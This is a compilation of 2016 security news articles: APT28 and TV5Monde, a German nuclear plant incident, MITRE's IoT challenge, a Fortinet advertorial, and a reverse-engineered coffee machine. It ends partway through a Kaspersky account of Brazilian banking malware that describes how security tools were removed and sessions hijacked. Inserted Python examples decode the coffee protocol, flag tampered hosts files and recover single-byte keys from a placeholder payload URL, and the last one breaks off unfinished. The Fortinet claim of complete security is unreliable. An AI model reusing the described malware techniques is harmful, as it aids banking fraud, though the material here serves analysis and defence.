Other creative ways to discover vulnerable IoT devices include a flying drone with a tracking tool capable of sniffing out data from Internet-connected devices.
Challenge — Find Ways to Detect Vulnerable IoT Devices
Now, in an attempt to find a solution that can help network admins monitor IoT devices, non-profit research and development organization MITRE has challenged researchers to come up with new ideas for detecting rogue IoT devices on a network.
The good news: You can earn $50,000 for your idea.
Researchers who find and report a non-traditional, game-changing approach for identifying IoT devices while passively observing the network, without requiring modification to existing protocols or manufacturing, can earn up to $50,000.
"We are looking for a unique identifier or fingerprint to enable administrators to enumerate the IoT devices while passively observing the network," reads the MITRE website.
Along with the prize money, MITRE has also promised:
Recognition and Promotion.
The opportunity to connect with government agencies looking for IoT solutions.
The chance to work with MITRE experts to better understand the government's needs.
The MITRE IoT team has created a model home network that will serve as a testbed for the Challenge. This powerful home network includes a broad range of affordable devices with diverse operating characteristics.
"We believe that the identification techniques that prove effective in a home system will translate to industrial, healthcare, military, smart city, and other IoT networks," the team writes.
This Challenge is open to individual entrepreneurs, college teams looking to showcase their talents, and small companies that want to make their mark in the IoT market.
The registration period has already started, so you can register here. The challenge will begin in early November and run for approximately six weeks, so all participants will have to demonstrate a unique, simple and affordable solution to identify rogue IoT devices within this short period.
The winner will be announced before the end of December. So, if you think you have the potential to find out a solution to this issue, then what are you waiting for? Register yourself today.
The France TV5Monde was almost destroyed by the Russian APT28 group
11.10.2016 securityaffairs APT
The TV5Monde director-general has told the BBC that his TV was almost destroyed by a targeted cyber attack conducted by the Russian APT28 group.
In April 2015, TV5Monde was hit by a severe cyber attack that disrupted broadcasting across its channels. The attackers also hijacked the TV5Monde website and the French broadcaster's social media accounts.
TV5Monde is controlled by the French Government; hackers of the Cyber Caliphate claimed responsibility for shutting down broadcasting across its 12 channels for several hours, interrupting transmission.
Now new revelations on the facts have been disclosed by Yves Bigot, the director-general of TV5Monde. Mr. Bigot told the BBC that the cyber-attack came close to destroying the French TV network; however, further investigation suggests the involvement of a different threat actor, Russian hackers.
“It’s the worst thing that can happen to you in television,” Mr Bigot told BBC
“We were a couple of hours from having the whole station gone for good.”
“We were saved from total destruction by the fact we had launched the channel that day and the technicians were there,”
“One of them was able to locate the very machine where the attack was taking place and he was able to cut out this machine from the internet and it stopped the attack.”
“We owe a lot to the engineer who unplugged that particular machine. He is a hero here,”
The hackers compromised the network of the French TV on 23 January 2015, at least 10 weeks before launching the final attack, using custom malware designed to target the encoder systems used to transmit programmes.
The hackers carried out reconnaissance of the TV5Monde network to figure out how it broadcast its transmissions, then used the malware to destroy the internet-connected hardware that controlled the TV station's operations.
“The attack was far more sophisticated and targeted than reported at the time. The perpetrators had first penetrated the network on 23 January.” reported the BBC.
The investigators discovered multiple entry points used by the attackers, such as supplier networks and the remote-controlled cameras used in studios.
The involvement of a Russian threat actor, the APT28 group, was also suggested by the security firm FireEye.
According to security experts at FireEye, the Russian APT28 group (also known as Pawn Storm, Tsar Team, Fancy Bear and Sednit) may have used the name of ISIS as a diversionary strategy; the experts noticed a number of similarities between the TTPs used by the Russian group and those of the actor who breached the network at TV5Monde.
“There are a number of data points here in common,” said Jen Weedon, manager of threat intelligence at FireEye. “The ‘Cyber Caliphate website,’ where they posted the data on the TV5Monde hack was hosted on an IP block which is the same IP block as other known APT28 infrastructure, and used the same server and registrar that APT28 used in the past.”
Weedon confirmed that at the time of the TV5Monde attack, other journalists were targeted by the APT28 group and the attacks were coordinated by the same hacking infrastructure used by the team.
Experts at FireEye published a detailed report on APT28 in October 2014, speculating that the group is composed of state-sponsored hackers running a long-running cyber espionage campaign against US defense contractors, European security organizations and Eastern European government entities.
Mr. Bigot confirmed that the French cyber-agency told him that hackers had used the ISIS brand to cover their tracks.
The TV5Monde director was later told that evidence had been found that the attack was conducted by the Russian APT28 group.
Mr. Bigot explained that he has absolutely no idea why TV5Monde was chosen as the target.
“There are two things that the investigation won’t probably be able to achieve,” he added. “The first one is why us – why TV5Monde?” “And the second one is: Who gave the order and the money to that Russian group of hackers to actually do it?”
According to the BBC, which cited intelligence analysts in the UK, US and France, the cyber attack against the French TV was a highly targeted attack conducted by Russian hackers, most likely in an attempt "to test forms of cyber-weaponry as part of an increasingly aggressive posture".
Regardless of who the culprit is, one thing is certain: the cyber attack cost the TV station €5m ($5.6m) and left it with an increased recurring bill of €3m ($3.4m) for the additional security countermeasures it had to implement.
Shocking, a German nuclear plant suffered a disruptive cyber attack
11.10.2016 securityaffairs Cyber
A German nuclear plant suffered a disruptive cyber attack, the news was publicly confirmed by the IAEA Director Yukiya Amano.
According to the head of the United Nations nuclear watchdog, the International Atomic Energy Agency (IAEA) Director Yukiya Amano, a nuclear power plant in Germany was hit by a “disruptive” cyber attack two to three years ago.
“This issue of cyber attacks on nuclear-related facilities or activities should be taken very seriously. We never know if we know everything or if it’s the tip of the iceberg.” Amano told Reuters Agency.
“This is not an imaginary risk,” added Amano who also participated in a meeting with Foreign Minister Frank-Walter Steinmeier.
Amano confirmed that cyber attacks on nuclear plants are a serious threat, but he did not provide further details of either incident.
Fortunately, the damages caused by the cyber attack on the German nuclear plant did not force the operators to shut down its processes but urged the adoption of additional precautionary measures.
"This actually happened and it caused some problems," he said. "[the German plant] needed to take some precautionary measures."
Amano added that this is the first time the attack has been discussed in public; he also reported a case in which an individual tried to smuggle a small amount of highly enriched uranium with the intent to build a so-called "dirty bomb."
Be careful: the attack was disruptive, not destructive, and believe me there is a substantial difference. The term disruptive refers to a category of cyber attacks that are able to destroy internal computer systems without causing the complete destruction of the plant. Examples of disruptive attacks are the attacks against Sony Pictures Entertainment and Stuxnet.
This isn't the first time we have received news of cyber attacks on nuclear plants. There are three publicly known attacks against nuclear plants:
Monju NPP (Japan 2014)
Korea Hydro and Nuclear Power plant (S.Korea 2014)
Gundremmingen NPP (Germany 2016).
It is likely that Amano was referring to the cyber attack against the Gundremmingen nuclear plant that occurred earlier this year. In that case, security experts detected the Conficker and Ramnit malware.
Security experts are aware of the possibility that hackers could cause serious problems to nuclear plants worldwide.
According to a report released in March, Germany is not adequately equipped to prevent terrorist attacks in its nuclear plants.
The report was presented by Oda Becker, an independent expert on nuclear plants.
This is of course extremely distressing, especially in the light of the recent tragic events in Belgium with substantial casualties.
The report was brought to public attention at the German Federation for the Environment and Nature Conservation (BUND) Congress, where concerns were expressed towards protecting citizens from catastrophic consequences of another terrorist attack.
Amano explained that the UN agency was supporting countries to improve the resilience of their infrastructure to cyber attacks with a series of measures.
"Amano said the U.N. agency was helping countries increase cyber and overall nuclear security through training and a detailed database that included information from 131 countries, and by providing them with radiation detection devices." reported Reuters.
“Since 2010, the IAEA said it had trained over 10,000 people in nuclear security, including police and border guards, and has given countries more than 3,000 mobile phone-sized instruments for detecting nuclear and other radioactive material.”
MITRE will award $50,000 for a solution that detects rogue IoT Devices
11.10.2016 securityaffairs Safety
MITRE has challenged the security community to devise new methods that could help in detecting rogue IoT devices on a network.
The non-profit research and development organization MITRE has challenged security researchers to propose new methods and technologies that could help in detecting rogue Internet of Things (IoT) devices on a network.
The goal of the Unique Identification of IoT Devices Challenge is to prevent abuse of IoT devices by devising a solution that can help administrators monitor them.
Flawed IoT devices and poorly configured smart objects are a privileged target for hackers, who compromise them to build powerful botnets.
Recently, IoT botnets were observed launching massive DDoS attacks against OVH and KrebsOnSecurity.com.
MITRE will give a $50,000 reward to the researchers who propose a non-traditional method for enumerating IoT devices through passive network monitoring.
"The MITRE Challenge, Unique Identification of IoT Devices, seeks to discover possible solutions to this potential threat so our sponsors can reap the benefits of this technological evolution, while minimizing the risks." states MITRE.
“We are looking for non-traditional approaches for identifying IoT devices. In the future, manufacturers may embed unique digital signatures into each device. For today, we need to be able to monitor the products already in use.
We’re looking for a game-changing approach to identifying devices that would require no modification to the existing inventory, e.g., no change in protocols or manufacturing.”
The MITRE Unique Identification of IoT Devices Challenge offers participants from around the world recognition and promotion for coming up with a game-changing solution, and the opportunity to connect with government agencies looking for IoT solutions.
The challenge, which will begin in November, is open to research teams, companies and individuals.
Participants will have six weeks to propose their solutions for detecting bogus IoT devices.
MITRE has created a testbed network composed of a wide range of devices with different characteristics.
"The MITRE IoT team has built a model home network to serve as a testbed for the Challenge. This robust home system includes a broad array of affordable devices with diverse operating characteristics. We believe that the identification techniques that prove effective in a home system will translate to industrial, healthcare, military, smart city, and other IoT networks." reads the MITRE announcement.
According to EurActiv, the European Commission is working on legislation aimed at securing IoT devices. The legislation would force vendors and manufacturers to adopt a security-by-design approach for their smart objects.
Using clouds is completely secure thanks to Fortinet's security architecture
11.10.2016 SecurityWorld Security
The Internet of Things, cloud computing, virtualization and the use of personal devices on corporate networks bring unprecedented opportunities for business growth, but also new threats and security risks. Many companies still rely on outdated security strategies. Fortinet addresses today's cybersecurity problems with its Security Fabric security architecture.
The Security Fabric security architecture provides scalable, broad-spectrum protection against security threats through a tightly integrated, effective security infrastructure.
"Ubiquitous digitalization is changing established business models, while technology trends such as the Internet of Things and cloud computing are blurring the boundaries of today's networks. Unfortunately, many enterprises still rely on decades-old security strategies that do not match the dynamics of today's business. Unlike platforms loosely coupled at the management level, the Security Fabric architecture weaves highly advanced hardware and software together like a fabric, enabling direct communication between individual solutions and thus a unified, rapid response to threats," explains Ken Xie, head of Fortinet.
The integrated, collaborative and adaptive Security Fabric architecture gives enterprises distributed security and protects against threats from the Internet of Things and remotely connected devices, both at the core of the information infrastructure and in the cloud.
Five core principles of Security Fabric
The Security Fabric security architecture links previously independent systems into a single interconnected whole based on five core, mutually dependent principles: scalability, awareness, security, actionability and openness.
For a security architecture to detect and neutralize threats in every part of today's borderless networks, it must be dynamically adaptable (scalable), not only with respect to changing volume and performance requirements but also with respect to the scope and nature of the network. Fortinet's portfolio of security technologies includes solutions covering every part of the infrastructure, including wired and wireless networks, user endpoints and IoT devices, access layers, public, private and hybrid cloud models, software-defined networks and virtualization. The technologies ensure that network functionality, performance and scalability are not impaired by the security components.
The extensibility of Fortinet's solutions across the entire infrastructure is the foundation for another fundamental principle of the Security Fabric architecture: awareness. The architecture works as a whole, providing visibility into the devices, users, content and data flowing into and out of the network, and into traffic patterns. On one hand this reduces complexity and cost; on the other it increases management efficiency and eases the rollout of new capabilities and innovative security strategies.
Complete visibility into the infrastructure is essential to achieving the required level of security against all types of threats. FortiOS, the most widely deployed security operating system in the world, serves as the common interface for all components of the Fortinet Security Fabric architecture. Technologies such as the Fortinet Advanced Threat Protection Framework perform deep traffic analysis, dynamically generate local threat intelligence and pass the data to FortiGuard Labs, which automatically distributes updates to the whole system in real time. The breadth of this information, together with sophisticated, scalable and fast analysis, gives the security architecture actionable input that enables rapid response and neutralization of threats wherever they occur.
To let customers leverage their existing investments in infrastructure and security, the Security Fabric architecture is designed to integrate with a wide range of third-party solutions. Fortinet works closely with partners in its global alliance on developing open APIs for all parts of the security architecture. This gives customers the flexibility to deploy Fortinet solutions alongside existing or new security technologies and to integrate them for a higher level of protection.
More information at: http://demand.fortinet.com/cz-securityfabric
FortiOS | Architecture for secure access |
Access applications | Advanced network applications supporting connectivity. Integrated, comprehensive access-application solutions that enable guest access, provide visibility into connected devices and users, handle onboarding of new devices, etc. |
Authentication / endpoints | Onboarding and securing all users and devices. Fortinet's authentication applications automate onboarding of new guest and employee devices and offer single sign-on, certificate management and other functions. |
Management | Flexibility of on-premises and cloud deployment. Choice of access-layer deployment with or without a controller, cloud-based, multi-channel or single-channel. |
Security | Next-generation access security. A comprehensive portfolio of network security appliances offers enterprise-grade protection against cyber threats at the access layer. |
Controllers | Central management of all wireless access points and LAN switches. Infrastructure (standalone) and integrated controllers offer flexible deployment options. Our new high-performance FortiWLC 50D, 200D and 500D infrastructure controllers support 50, 200 and 500 access points respectively, meet the 802.11ac Wave 2 standard and allow more devices to be connected. |
Switches | Enterprise-class switches for secure access and data centers. A wide range of high-performance, cost-effective access and data-center switches, including the FortiSwitch FS-224D-FPOE and FS-548D-FPO with 24 and 48 powered (PoE) ports respectively, and a line of 10 Gb/s Ethernet data-center switches with unified management via FortiGate appliances. |
Access points | WLAN access points for every enterprise and use case. Choice from a complete range of enterprise access points supporting 802.11ac Wave 2 and all deployment variants, including controller-based, controllerless and cloud-managed, for indoor and outdoor use. |
Turkey Blocks GitHub, Google Drive and Dropbox to Censor RedHack Leaks
10.10.2016 thehackernews Security
Turkey Blocks GitHub, Google Drive, Dropbox & Microsoft OneDrive To Censor RedHack Leaks
Turkey is again in the news for banning online services, and this time, it's a bunch of sites and services offered by big technology giants.
The Turkish government has reportedly blocked access to cloud storage services including Microsoft OneDrive, Dropbox, and Google Drive, as well as the code hosting service GitHub, reports the censorship monitoring group Turkey Blocks.
The services were blocked on Saturday following the leak of some private emails allegedly belonging to Minister of Energy and Natural Resources Berat Albayrak — also the son-in-law of President Recep Tayyip Erdogan.
GitHub, Dropbox, and Google Drive are issuing SSL errors, which indicates interception of traffic at the national or ISP level. Microsoft OneDrive was subsequently blocked throughout Turkey as well.
The leaks come from a 20-year-old hacktivist group known as RedHack, which leaked 17GB of files containing some 57,623 stolen emails dating from April 2000 to September this year. A Turkish court confirmed the authenticity of the leak.
The move to block the aforementioned services is seemingly intended to suppress circulation of these stolen emails and to stop Internet users from hosting the email dumps on their accounts; the emails allegedly reveal a widespread campaign of propaganda and deception.
According to Turkey Blocks, Google Drive had already been unblocked on Sunday, while other services are still unavailable in the country.
Like China, Turkey has long been known for blocking access to major online services in order to control what its citizens can see about their government on the Internet. In March, the country banned its people from accessing Facebook and Twitter following a car bomb explosion in the Turkish capital, Ankara.
The same happened in March 2014, when Twitter was banned in Turkey after an audio clip was leaked on YouTube and Twitter about the massive corruption of Turkish Prime Minister Recep Tayyip Erdoğan, in which he instructs his son to dispose of large amounts of cash in the midst of a police investigation.
Also, it is not the first time a group of hackers has exposed personal emails of members of the Turkish government. A few months ago, personal details of almost 50 Million Turkish citizens, including the country's President Recep Tayyip Erdogan, were posted online.
Apple Watches banned from UK cabinet meetings to prevent eavesdropping
10.10.2016 securityaffairs Apple
The UK Government has decided to ban Apple Watches from the Cabinet over fears of foreign eavesdropping, as it did with the iPad in 2013.
Politicians fear cyber espionage: the recent string of cyber attacks against the US Presidential election and the constant pressure from Chinese hackers call for greater awareness of cyber threats. In 2013, cabinet ministers were banned from bringing smartphones and tablets to meetings, when the UK Government decided to ban iPads from the Cabinet over fears of foreign eavesdropping.
The news was reported by the Mail on Sunday: after Cabinet Office minister Francis Maude gave a presentation using his iPad, Downing Street security staff removed the mobile devices to prevent eavesdropping on the ongoing discussions.
Now the Tory government's cabinet ministers have banned Apple Watches from internal meetings in case they are compromised by foreign cyber spies. The UK Government believes that Russian hackers could exploit this category of devices to gather sensitive information.
“Ministers have been barred from wearing Apple Watches during Cabinet meetings amid concerns that they could be hacked by Russian spies, The Telegraph has learned.” reported the Telegraph.
"Mobile phones have already been barred from the Cabinet because of similar concerns. One source said: 'The Russians are trying to hack everything.'"
It seems that Apple Watches were very popular gadgets among cabinet ministers when David Cameron was prime minister. Things have changed under Prime Minister Theresa May, who banned the devices amid fears that foreign hackers could listen in on government business.
The measure was adopted to prevent foreign security services from infecting wearable devices that could then be used to spy on the ministers.
Reverse engineering a Smarter Coffee machine for fun and a security lesson
10.10.2016 securityaffairs Safety
Simone Margaritelli has reverse engineered the Smarter Coffee IoT Machine Protocol to control the machine from his terminal. What is the lesson?
While the security industry is stressing the need to adopt a security-by-design approach for IoT devices, security researchers continue to find flawed and poorly designed smart objects.
Clearly, this kind of device is a privileged target for crooks, who could abuse them to conduct a wide range of illegal activities.
Ok … but it's time for a coffee break now, and surfing the web I found a curious and interesting article by a popular Italian hacker, Simone Margaritelli, aka evilsocket. Simone is a former blackhat hacker, now a mobile security researcher and senior ASM/C/C++ developer at Zimperium, and he is the creator of the popular tool bettercap.
Like me, Simone loves coffee, so a few days ago he bought a Smarter Coffee machine that can be controlled via a mobile application, which lets users prepare a good coffee with many options.
Simone Margaritelli decided to reverse engineer the Smarter Coffee IoT Machine Protocol with the intent of controlling the coffee machine from his terminal.
The expert focused his analysis on the classes and methods present in the app's source code, and found something of interest in the am.smarter.smarterandroid.models.a class.
The researcher discovered how the app and the machine communicate and the protocol they use.
“Each of these “packets” is sent to tcp port 2081 of the machine, the protocol is very simple.
First byte: the command number.
Second byte to N: optional data ( depending on the command code ).
Last byte: always 0x7e which indicates the end of the packet.
Responses can vary, but for most of the commands they are:
First byte: response size
Second byte: status ( 0 = success otherwise error code )
Last byte: always 0x7e.
An example command and response, the one to keep the coffee warm for 5 minutes for instance, would be:
COMMAND : 0x3e 0x05 0x7e
RESPONSE : 0x03 0x00 0x7e”
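The framing quoted above is simple enough to implement and validate end to end. The following is an added example (not Simone Margaritelli's code and not from his GitHub repo): it builds command packets, decodes responses, and splits a captured stream of port 2081 traffic into individual responses, rejecting anything that breaks the documented framing. It does no network I/O; the command number 0x3e is taken from the quoted keep-warm example.

```python
"""Encoder/decoder for the Smarter Coffee TCP framing quoted above (tcp/2081).

Added example, not the researcher's own code. Framing rules come from the
quoted post; 0x3e is the "keep warm" command shown in the quoted example.
"""
from __future__ import annotations

from dataclasses import dataclass

TERMINATOR = 0x7E       # every command and response ends with this byte
CMD_KEEP_WARM = 0x3E    # from the quoted example: 0x3e <minutes> 0x7e


class FramingError(ValueError):
    """Raised when a byte string does not follow the documented framing."""


def build_command(command: int, data: bytes = b"") -> bytes:
    """Frame a command: [command][optional data...][0x7e]."""
    if not 0 <= command <= 0xFF:
        raise ValueError("command must fit in one byte")
    if TERMINATOR in data:
        # The protocol has no escaping, so a 0x7e inside the payload would be
        # read by the machine as an early end-of-packet.
        raise FramingError("0x7e inside data is ambiguous in this framing")
    return bytes([command]) + data + bytes([TERMINATOR])


def keep_warm_command(minutes: int) -> bytes:
    """The command from the post: keep the coffee warm for N minutes."""
    if not 0 <= minutes <= 0xFF:
        raise ValueError("minutes must fit in one byte")
    return build_command(CMD_KEEP_WARM, bytes([minutes]))


@dataclass(frozen=True)
class Response:
    size: int       # first byte: total length of the response, itself included
    status: int     # second byte: 0 = success, otherwise an error code
    payload: bytes  # anything between the status byte and the terminator

    @property
    def ok(self) -> bool:
        return self.status == 0


def parse_response(raw: bytes) -> Response:
    """Decode [size][status][payload...][0x7e], checking every framing rule."""
    if len(raw) < 3:
        raise FramingError("response needs at least size, status and terminator")
    if raw[-1] != TERMINATOR:
        raise FramingError(f"missing 0x7e terminator, got 0x{raw[-1]:02x}")
    size = raw[0]
    if size != len(raw):
        raise FramingError(f"size byte says {size} bytes but {len(raw)} received")
    return Response(size=size, status=raw[1], payload=raw[2:-1])


def is_well_formed(raw: bytes) -> bool:
    """True if raw is a single response that satisfies the framing rules."""
    try:
        parse_response(raw)
    except FramingError:
        return False
    return True


def parse_stream(stream: bytes) -> list[Response]:
    """Split back-to-back responses (e.g. from one captured TCP segment).

    The size byte, not the 0x7e byte, drives the split: a status/error code
    could legitimately equal 0x7e, so delimiting on it would mis-frame.
    """
    responses = []
    pos = 0
    while pos < len(stream):
        size = stream[pos]
        if size == 0:
            raise FramingError("zero-length response")
        responses.append(parse_response(stream[pos:pos + size]))
        pos += size
    return responses


if __name__ == "__main__":
    print(keep_warm_command(5).hex(" "))            # 3e 05 7e
    print(parse_response(bytes([0x03, 0x00, 0x7E])))  # size=3 status=0 payload=b''
```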
At this point, it was trivial for Simone to write a simple console to send commands to the Smarter Coffee machine, as you can see in the video PoC published by the hacker.
Simone has published the code on GitHub; below are a few samples of the commands available to control the coffee machine.
Make one cup of coffee: coffee make.
Make two cups using the filter instead of the beans in the grinder: coffee make --filter.
Keep coffee warm for ten minutes: coffee warm --keep-warm=10.
Simone Margaritelli highlighted that anyone on the same network as the machine could send commands to the device, due to the absence of authentication.
"Even if the mobile app requires you to register an account, access to port 2081 is completely unauthenticated ( in fact, I've found that the user account is only used for statistics using the Firebase API ), anyone on your network could access it and even flash a new firmware with no authentication required ( I reversed the UPDATE_FIRMWARE packet as well but you won't find it on the repo 😛 )" Simone wrote in a blog post.
The evolution of Brazilian Malware
2.4.2016 Source: Kaspersky Virus
Brazilian malware continues to evolve day by day, making it increasingly sophisticated. If you want to know how the various malicious programs work nowadays, you can jump to the corresponding section here. Meanwhile, before that, we would like to show how the techniques used by Brazilian cybercriminals have changed, becoming more advanced and increasingly complex.
Taking a look at the wider picture we can see that the authors are improving their techniques in order to increase malware lifetime as well as their profits.
Some time ago, analyzing and detecting Brazilian malware could be done pretty quickly because there was no obfuscation, no anti-debugging technique, no encryption, plain-text-only communication, etc. The code itself used to be written in Delphi and Visual Basic 6, with a lot of big images inside making the file huge, and poor exception handling that made the process crash regularly.
Nowadays, the scenario is not the same; the attackers are investing time and money to develop solutions where the malicious payload is completely hidden under a lot of obfuscation and code protection. They still use Delphi and VB, but have also adopted other languages like .NET, and the code quality is much better than before, making it clear to us that they have moved to a new level.
Let’s walk through some samples showing the difference between what we used to find a few years ago and the threats being delivered today.
What we used to find
Keylogger
The first samples used to steal banking information from customers were simple keyloggers, most of them based on publicly available code with minor customizations so that only specific situations were logged. At the time this was sufficient, since banking websites were not using any kind of protection against this threat.
Public keylogger source code
Code implemented on malicious binary
The code was pretty simple; it just used the function GetAsyncKeyState in order to check the state of each key and then logged it as necessary. Most of the keyloggers were not using any obfuscation to hide the targets, helping in the identification of such attacks.
Plaintext strings used to detect navigation
Phishing Trojan
After the banks introduced virtual keyboards to their systems, keyloggers were no longer effective. To bypass these protections, the Brazilian bad guys started developing mouselogger malware and later Phishing Trojans.
This type of malware was using DDE (Dynamic Data Exchange) in order to get the current URL opened in the browser; this method still works nowadays, but most of these malicious programs have updated their code to use OLE Automation instead of DDE because it provides more advanced options.
Code using DDE to get URL information
After getting the current URL the malware just checks if the URL is in the target list. If found, the malware would show a phishing screen asking for banking information.
Phishing Trojan being shown inside Internet Explorer
At this time the malware was not using any kind of encryption or encoding – all strings were plaintext making the analysis easier.
Malware strings without any encryption/encoding
The stolen information is then sent to the attacker by email.
Email containing the stolen information
Hosts
To steal information without a conspicuous phishing Trojan, they started redirecting users to malicious web pages by changing the hosts file so that the banking domain names resolve to hardcoded servers. After infection the attack is far more transparent to the user, which increases the chances of success.
Data written to the hosts file in order to redirect access
Code used to write data to host file
These types of attack were very effective at the time, as not all anti-malware vendors were able to identify and block them. We can still see some samples using hosts-file modifications, but they are not so effective anymore.
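One way a defender can look for this tampering is to review the hosts file for entries that pin a watched domain to anything other than loopback, or that point any name at a non-local address. The script below is an added example written for this page, not code from the Kaspersky article; the watched bank domains and the hosts-file content are constructed, and the list of "local" network ranges is an assumption about what a benign hosts file normally contains.

```python
# Added example (not from the article): review a Windows hosts file for the
# redirection technique described above. Watch list and sample hosts content
# are constructed for this demo.
import ipaddress

# Constructed watch list; replace with the domains you actually care about.
WATCHED_DOMAINS = {
    "bancoexemplo.com.br",
    "www.bancoexemplo.com.br",
    "internetbanking.example",
}

LOOPBACK = {"127.0.0.1", "::1"}

# Assumption: a benign hosts entry points at loopback or a private range.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fe80::/10",
)]


def parse_hosts(text):
    """Yield (address, hostname) pairs, ignoring comments and blank lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:
            yield fields[0], name.lower()


def is_local(addr):
    # ip_network.__contains__ is False across IPv4/IPv6 versions, so mixing is safe.
    return any(addr in net for net in LOCAL_NETS)


def find_suspicious_entries(text, watched=WATCHED_DOMAINS):
    """Return (address, hostname, reason) triples a defender should review."""
    findings = []
    for ip, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((ip, name, "unparseable address"))
            continue
        if name in watched and ip not in LOOPBACK:
            findings.append((ip, name, "watched domain pinned to non-loopback address"))
        elif not is_local(addr):
            findings.append((ip, name, "non-local address override"))
    return findings


# Constructed hosts-file content with two malicious-looking lines.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.168.10.5    intranet.corp.local
203.0.113.77    www.bancoexemplo.com.br   # constructed malicious entry
203.0.113.77    bancoexemplo.com.br
198.51.100.9    update.example.org
"""

if __name__ == "__main__":
    for ip, name, reason in find_suspicious_entries(SAMPLE_HOSTS):
        print(f"{ip:16} {name:32} {reason}")
```

A watched domain pinned to loopback is deliberately not reported: that blocks access rather than redirecting it, which is the pattern described here. The "local" ranges are checked explicitly instead of relying on `is_global`, because the standard library treats documentation ranges such as 203.0.113.0/24 as non-global and would otherwise hide the sample entries.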
Anti-rootkit
At this stage they realized that anti-malware solutions and internet banking security plugins were making their work more difficult. They then started to focus their efforts on removing security solutions before running the malicious payload in order to increase the chances of a successful execution and to keep running on the infected machine for much longer.
Nothing could be better than using well-known command-line tools that already have this capability, most of which are already whitelisted.
RegRun Partizan
This tool is a Native Executable that runs at system startup, before the Win32 subsystem starts. It is able to delete files and registry keys even if they are protected by kernel-mode drivers, since it is executed before the drivers are loaded. The commands to be executed are specified in the .RRI file, as shown below.
Partizan RRI script containing the list of files to remove
The Avenger
A Windows driver designed to remove persistent files and registry keys. The commands to be executed on the system are written to a script that will be read by the driver once it starts.
The Avenger GUI and script to delete security solutions
Gmer
Gmer is a well-known rootkit detector and remover with lots of functions to detect rootkit activities on the system as well as delete files by using its own device driver. As it has a command-line interface, it is easy to remove protected files.
BAT file using GMER’s killfile function to remove security solution
More details about banking Trojans using GMER to uninstall security software can be found in a separate blogpost.
Malicious Bootloader
After using anti-rootkits, Brazil’s cybercriminals went deeper and started to develop their own bootloaders, tailored exclusively to remove the security solutions from the user’s machine. The downloader is in charge of installing the malicious files and then rebooting the machine. After the reboot the malicious bootloader can remove the desired files from the system.
Basically, the malware replaces the original NTLDR, the bootloader for Windows NT-based systems up to Windows XP, with a modified version of GRUB.
Modified GRUB loader acting as NTLDR
This loader reads the menu.lst file, which points to the malicious files already installed on the system, xp-msantivirus and xp-msclean.
Menu.lst file containing the parameters to execute malicious commands
When executed the malware will remove files related to security solutions and then restore the original NTLDR files that were previously renamed to NTLDR.old.
Commands executed to remove security modules and restore the original NTLDR
What we have nowadays
Automation
Most banks were using machine identification to prevent unauthorized attempts to perform operations using the stolen information. To bypass this the bad guys started performing the malicious operations from the infected machine, by using Internet Explorer Automation (formerly OLE automation) to interact with the page content.
The first samples using this type of attack were Browser Helper Objects (BHOs) that could detect a transfer transaction and then change the destination account, sending the money to the attacker instead of the real destination.
Later, the same method was heavily used in Boleto attacks, where they were using automation to get the inputted barcode and then replace it with the fraudulent one.
Since this method only works for Internet Explorer, the malware needs to force the user to access internet banking via that browser. Therefore, it implements a timer which checks if Firefox or Chrome is being used and then kills the process.
Code to avoid use of Chrome and Firefox
When an instance of IE is found, the malware will search for a tab instance in order to be able to read the window text and then to know which URL is being accessed.
Finding the tab handle and obtaining the URL being accessed
Search for target’s specific titles
As the automation will process the page structure, it needs to know whether the victim is on the page where the Boleto information is entered. It installs a handler for the OnDocumentComplete event in order to collect the full URL as soon as the page is loaded, and then checks whether the user is on the target page.
Search for target’s specific pages
After confirming that the user is on the target page, the malware processes the page structure and installs a handler on the submit button, so that it can take control of execution right after the user submits the page and process the inputted content.
Search for a specific textbox and get the inputted data
After collecting the inputted data, it can be processed and then changed to the malicious content before submitting the page.
In the samples we found, this method is combined with string obfuscation, debugger detection and virtual machine detection, so they are not as easy to detect as the phishing Trojan and hosts-file attacks.
Code Obfuscation and RunPE
Looking for new ways to bypass detection, Brazilian criminals started using obfuscation in order to hide the parts of code that perform their main operations.
In the code below the coder has encrypted the original code of the function used to download the malicious payload; in static analysis you cannot figure out what the purpose of this function is.
Encrypted downloader function
At runtime the malware calls a function to decrypt this code prior to executing it.
Decrypt code call
Decryption routine
As we can see in the code above, the decryption is a simple subtraction of the key 0x42 from each encrypted byte – a simple and fast way to hide parts of the code.
Decrypted downloader function
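A single-byte scheme like this does not need the key to be read out of the sample: an analyst can try every key and look for a known fragment. The block below is an added example for this page, not the malware's routine nor Kaspersky's tooling; the hidden URL is constructed, and the crib list is an assumption about what typically appears once code or strings are unhidden. It handles the sub variant the article describes and the XOR variant as well.

```python
# Added example (not from the article): recover a single-byte "sub" or XOR key
# of the kind used to hide the downloader function. Sample data is constructed.
import string

PRINTABLE = set(string.printable.encode())

# Assumed known-plaintext fragments that usually show up once data is unhidden.
CRIBS = (b"http", b"MZ", b"This program", b".exe", b".dll", b"kernel32")


def sub_decrypt(data, key):
    """Undo the add-with-key hiding: subtract the key from each byte modulo 256."""
    return bytes((b - key) & 0xFF for b in data)


def xor_decrypt(data, key):
    return bytes(b ^ key for b in data)


def printable_ratio(buf):
    return sum(b in PRINTABLE for b in buf) / len(buf) if buf else 0.0


def recover_key(data, cribs=CRIBS):
    """Try both operations over all 256 keys.

    Returns (op, key, plaintext, crib). A candidate that reveals a crib wins
    outright; otherwise the most printable candidate is returned with crib=None.
    Printability alone is ambiguous for 'sub' (shifting letters by a small
    amount keeps them printable), which is why cribs are tried first.
    """
    fallback = None
    for op, fn in (("sub", sub_decrypt), ("xor", xor_decrypt)):
        for key in range(256):
            pt = fn(data, key)
            for crib in cribs:
                if crib in pt:
                    return op, key, pt, crib
            score = printable_ratio(pt)
            if fallback is None or score > fallback[0]:
                fallback = (score, op, key, pt)
    _, op, key, pt = fallback
    return op, key, pt, None


# Constructed sample: a downloader URL hidden with the sub-0x42 scheme
# (the hiding step adds 0x42 to every byte; the malware subtracts it at runtime).
PLAIN = b"http://malicious.example/payload.bin"
SAMPLE = bytes((b + 0x42) & 0xFF for b in PLAIN)

if __name__ == "__main__":
    op, key, pt, crib = recover_key(SAMPLE)
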